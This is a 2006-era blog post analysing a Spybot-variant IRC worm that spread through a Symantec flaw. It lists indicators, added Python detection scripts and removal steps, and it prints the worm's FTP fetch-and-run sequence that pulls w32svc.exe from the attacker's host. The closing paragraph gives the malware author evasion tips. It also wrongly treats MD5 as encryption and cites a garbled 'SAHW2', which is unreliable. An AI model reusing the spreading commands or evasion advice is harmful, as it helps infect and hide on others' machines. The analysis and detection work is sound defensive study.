Defeating A Botnet Trust Him, It’s Easy

Posted 1655 days ago - Security, Windows

Author: |sid| (efnet)

In late November, security reports indicated a new worm was spreading through our network, taking advantage of a vulnerability in Symantec’s anti-virus/computer security products. The vulnerability, which affected a variety of Symantec's products, was discovered or made public in May 2006. The weakness allowed an attacker to execute code remotely on fully patched Windows 2000 and Windows XP machines. A lead security specialist from eEye reported that malicious individuals were actively exploiting the weakness to gain control of machines for use in botnets. Once a machine was infected, the Trojan called home to the IP address 38.118.143.201. The first compromised machine immediately began scanning other machines on the same subnet. We had already observed an instance of the scanning on the [removed] campus via a wireless DHCP host. The IP was quickly blocked; however, quite a few machines had already been infected.

The security team decided to take a look at the new worm and see what was under the hood. They obtained one of the infected machines from a faculty member and placed it in a controlled test environment. The test environment consisted of a single Dell Optiplex GX620. The machine had Windows 2003 Server installed and was set up to run 50 virtual machines, 5 of which were used to run services such as Exchange, DNS and DHCP. The remaining 45 acted as typical XP workstations, all with unpatched versions of Symantec's Security Suite installed (Windows itself can be fully patched; it is SAV that needs the patch). The faculty member's infected machine and the GX620 were connected using a simple Netgear 4-port 10/100Mbps switch.

This mock network was set up in an effort to monitor the worm in a production environment, to see what its capabilities were, and to analyze the bot's procedures as programmed by the author. The worm quickly spread throughout the virtual environment and, within fifteen to twenty minutes, had successfully installed an IRC bot on every machine. The next step was to figure out the inner workings of the worm and the bot that came with it. Using some common security tools, such as Ethereal, SoftICE and a little Perl scripting, the security team was able to come up with the following:

The bot uses www.flackware.info as its Command and Control. Here is the information that I know so far:

========= Command and Control ===================

www.flackware.info:6667/tcp (the only apparent name/port used)
(auto)JOIN #text airforce

========= File Info =========

MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
w32svc.exe is 1.12 MB (1,182,208 bytes) (MASSIVE for a bot!)
Symantec definitions 11/27/2006 rev.50 and later will detect it as a Spybot variant

============= How to Obtain =============

The bot uses a built-in FTP server ("Reptile", a.k.a. "StnyFTPd") to spread. When it compromises a machine, it executes the following commands:

echo open (ip address of attacker) (ftp server port) > i
echo user 1 1 >> i
echo get w32svc.exe >> i
echo quit >> i
ftp -As:i
w32svc.exe
exit

======== When Run ========

Installs itself to %WINDIR%\w32svc.exe
Sets Windows File Protection to "Scan only at bootup"
Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft\backup.ftp and backup.tftp
Drops a new ftp.exe and tftp.exe into %WINDIR%\System32
Attempts to connect to the Command and Control server
Installs itself as a service in many places within the registry

======== Infection Vectors ========

Almost certainly via SYM06-010
Almost certainly other Windows vulnerabilities (since patched)

======== Detecting Infections - Network ========

Looking for DNS queries for www.flackware.info
Looking for network traffic to port 6667/tcp going to the IP address for www.flackware.info
Looking for scanning (more than 3-4 destinations) on port 2967/tcp
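The three network indicators above can be checked mechanically. The script below is an added example written for this write-up, not the security team's own tooling; it assumes two constructed log formats (one line per flow record, one line per DNS query) that stand in for whatever a real sensor exports, and it uses the C2 hostname, the 38.118.143.201 call-home address, 6667/tcp and 2967/tcp from the report. A host is reported as a scanner once it has touched at least four distinct destinations on 2967/tcp, matching the "more than 3-4 destinations" rule of thumb.

```python
"""Network-side triage for the w32svc.exe Spybot variant.

Added example, not the original team's code. Log formats are constructed:
  flow record: "<timestamp> <src> <dst> <dport> <proto>"
  DNS record:  "<timestamp> <client> <queried name>"
"""
from collections import defaultdict

C2_HOST = "www.flackware.info"   # C2 name from the write-up
C2_IPS = {"38.118.143.201"}      # call-home address from the write-up
C2_PORT = 6667                   # IRC port from the write-up
SCAN_PORT = 2967                 # Symantec service port targeted by SYM06-010
SCAN_MIN_TARGETS = 4             # "more than 3-4 destinations"

# Constructed sample flows: 10.1.5.20 sweeps five neighbours on 2967/tcp
# (one of them twice) and then calls home; 10.1.5.31 touches only two.
FLOW_LOG = """\
2006-11-28T09:00:01 10.1.5.20 10.1.5.21 2967 tcp
2006-11-28T09:00:01 10.1.5.20 10.1.5.22 2967 tcp
2006-11-28T09:00:02 10.1.5.20 10.1.5.23 2967 tcp
2006-11-28T09:00:02 10.1.5.20 10.1.5.24 2967 tcp
2006-11-28T09:00:02 10.1.5.20 10.1.5.25 2967 tcp
2006-11-28T09:00:03 10.1.5.20 10.1.5.21 2967 tcp
2006-11-28T09:00:05 10.1.5.20 38.118.143.201 6667 tcp
2006-11-28T09:00:07 10.1.5.31 10.1.5.20 2967 tcp
2006-11-28T09:00:09 10.1.5.31 10.1.5.22 2967 tcp
2006-11-28T09:01:00 10.1.5.40 10.1.5.2 53 udp
"""

# Constructed sample DNS queries; 10.1.5.33 resolves the C2 name but has
# no flow yet, which is exactly the early warning the DNS check gives.
DNS_LOG = """\
2006-11-28T08:59:58 10.1.5.20 www.flackware.info
2006-11-28T09:00:40 10.1.5.31 www.example.edu
2006-11-28T09:01:10 10.1.5.33 www.flackware.info.
"""


def parse_flows(text):
    """Return (src, dst, dport, proto) tuples; blank and '#' lines are skipped."""
    flows = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        _ts, src, dst, dport, proto = line.split()
        flows.append((src, dst, int(dport), proto.lower()))
    return flows


def parse_dns(text):
    """Return (client, qname) tuples with the name normalised to lower case."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        _ts, client, qname = line.split()
        records.append((client, qname.rstrip(".").lower()))
    return records


def hosts_resolving_c2(dns_records):
    """Clients that asked for the C2 name (indicator 1)."""
    return sorted({client for client, qname in dns_records if qname == C2_HOST})


def hosts_talking_to_c2(flows):
    """Clients with 6667/tcp flows to a known C2 address (indicator 2)."""
    return sorted({src for src, dst, dport, proto in flows
                   if proto == "tcp" and dport == C2_PORT and dst in C2_IPS})


def scanners(flows):
    """Map of src -> distinct 2967/tcp targets, for hosts over the threshold (indicator 3)."""
    targets = defaultdict(set)
    for src, dst, dport, proto in flows:
        if proto == "tcp" and dport == SCAN_PORT:
            targets[src].add(dst)
    return {src: len(dsts) for src, dsts in targets.items()
            if len(dsts) >= SCAN_MIN_TARGETS}


def triage(flow_text, dns_text):
    """Run all three checks and return the hosts flagged by each."""
    flows = parse_flows(flow_text)
    dns = parse_dns(dns_text)
    return {
        "dns_c2": hosts_resolving_c2(dns),
        "irc_c2": hosts_talking_to_c2(flows),
        "scanners": scanners(flows),
    }


if __name__ == "__main__":
    for indicator, hosts in triage(FLOW_LOG, DNS_LOG).items():
        print(f"{indicator}: {hosts}")
```

The DNS check is worth keeping even though the name was already blocked: a host that resolves www.flackware.info is infected whether or not its IRC connection ever succeeds, and blocking the C2 address does nothing to stop the local 2967/tcp sweep.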

======== Identifying Infection - At the Computer ========

Look for %WINDIR%\w32svc.exe
Look for a Service called "Windows Network Firewall"
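The two host indicators can be checked the same way. This is an added example, not the security team's tooling. The decision logic is a pure function over a list of %WINDIR% file names and a mapping of service registry key names to display names, so it can be exercised with constructed data anywhere; the collector that fills those inputs from the live SYSTEM\CurrentControlSet\Services hive only runs on Windows. The service key name "wnfw" in the sample data is a constructed placeholder, since the report gives only the display name.

```python
"""Host-side check for the w32svc.exe bot: dropped file plus the
"Windows Network Firewall" service. Added example, not the original code."""
import os
import sys

BOT_FILE = "w32svc.exe"                       # dropped to %WINDIR% per the write-up
BOT_SERVICE_DISPLAY = "Windows Network Firewall"  # display name per the write-up

# Constructed sample inputs; "wnfw" is a placeholder key name, not an IoC.
SAMPLE_FILES = ["explorer.exe", "notepad.exe", "W32SVC.EXE"]
SAMPLE_SERVICES = {
    "Dhcp": "DHCP Client",
    "MpsSvc": "Windows Firewall",          # legitimate, similar-looking name
    "wnfw": "Windows Network Firewall",    # the bot's service
}


def evaluate(windir_files, services):
    """Return a list of findings. Comparisons are case-insensitive because
    the dropper may write the file name in any case."""
    findings = []
    if BOT_FILE in {name.lower() for name in windir_files}:
        findings.append("file present: %WINDIR%\\" + BOT_FILE)
    for key, display in services.items():
        if (display or "").strip().lower() == BOT_SERVICE_DISPLAY.lower():
            findings.append(f"service '{display}' registered under key {key}")
    return findings


def collect_windows():
    """Gather evaluate() inputs from a live Windows host (Windows only)."""
    import winreg  # stdlib, present only on Windows builds of Python
    windir = os.environ.get("WINDIR", r"C:\Windows")
    files = os.listdir(windir)
    services = {}
    path = r"SYSTEM\CurrentControlSet\Services"
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as root:
        index = 0
        while True:
            try:
                name = winreg.EnumKey(root, index)
            except OSError:          # no more subkeys
                break
            index += 1
            try:
                with winreg.OpenKey(root, name) as key:
                    # DisplayName may be a resource reference (@...,-nnn);
                    # the exact-string compare above then simply does not match.
                    services[name] = winreg.QueryValueEx(key, "DisplayName")[0]
            except OSError:          # service with no DisplayName value
                services[name] = None
    return files, services


if __name__ == "__main__":
    if sys.platform == "win32":
        files, services = collect_windows()
    else:
        files, services = SAMPLE_FILES, SAMPLE_SERVICES
    for finding in evaluate(files, services) or ["no indicators found"]:
        print(finding)
```

A hit on either indicator is enough to treat the box as infected; the service check matters because the file can be renamed by a later variant while the registry entries, as the removal section notes, are numerous and rarely cleaned up.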

======= Removal =======

Symantec definitions 11/27/2006 rev.50 performed admirably on my test box. Assuming the host did not have any other malware loaded onto it after infection, updating the AV definitions to that "rev" or later, scanning the hard drive, then rebooting when prompted should do the trick. Manual removal: set the "Windows Network Firewall" service to "Disabled" and reboot (you can't stop the service while it is running). Delete the w32svc.exe file and, preferably, remove the associated (dozens of) registry keys.

After a thorough analysis, the guys decided to join the flackware.info IRC server, since the IRCd was using the typical unencrypted port, 6667. After connecting to the server and joining the channel stated above, the guys were in an empty channel with an encrypted topic used to give further instructions to the bot. The encryption scheme was decrypted within forty-five minutes with an “on the spot” Perl script, thanks to what one member of the team called “weak encryption efforts.”

The now decrypted topic was a simple command to join another IRC server. After following the topic's instructions, they were not surprised to be given the same scenario: an empty channel and an encrypted topic. Discovering the algorithm streamlined the team's ability to proceed quickly through the poorly encrypted topics. This process continued through a total of sixteen servers. Finally, after hitting the sixteenth server, the topic instructed the bot(s) to connect to an FTP site where 2 spyware applications were available for download, one for Viagra and another for a five-day cruise. The sixteen servers were all compromised machines from a variety of countries, all running a custom IRCd and, needless to say, the FTPd mentioned above.

Chances are, some 13-year-old kid in Ukraine went through the trouble of carelessly configuring/modifying SpyBot source code, compromising sixteen servers, installing unencrypted IRC & FTP daemons, and scanning huge IP blocks just to install spyware on unpatched machines. All of this for probably a measly $0.50 per install. Had the kid stripped out the useless and/or unnecessary code to reduce the overall size of the bot, encrypted the executable itself with something stronger than MD5, and encrypted his IRCd & FTPd connections, we might have been impressed.

And Kid, if you end up reading this, next time try a tool called redeye to encrypt your executable. 256 bit SAHW2 > MD5 any day of the week. Also, encrypt your traffic by setting up daemons that support SSL connections, and don't use the default ports (duh).

-- |sid|

(editing by: admin - feel free to contact |sid|, root [-at-] darkfiber.ws for an original copy)
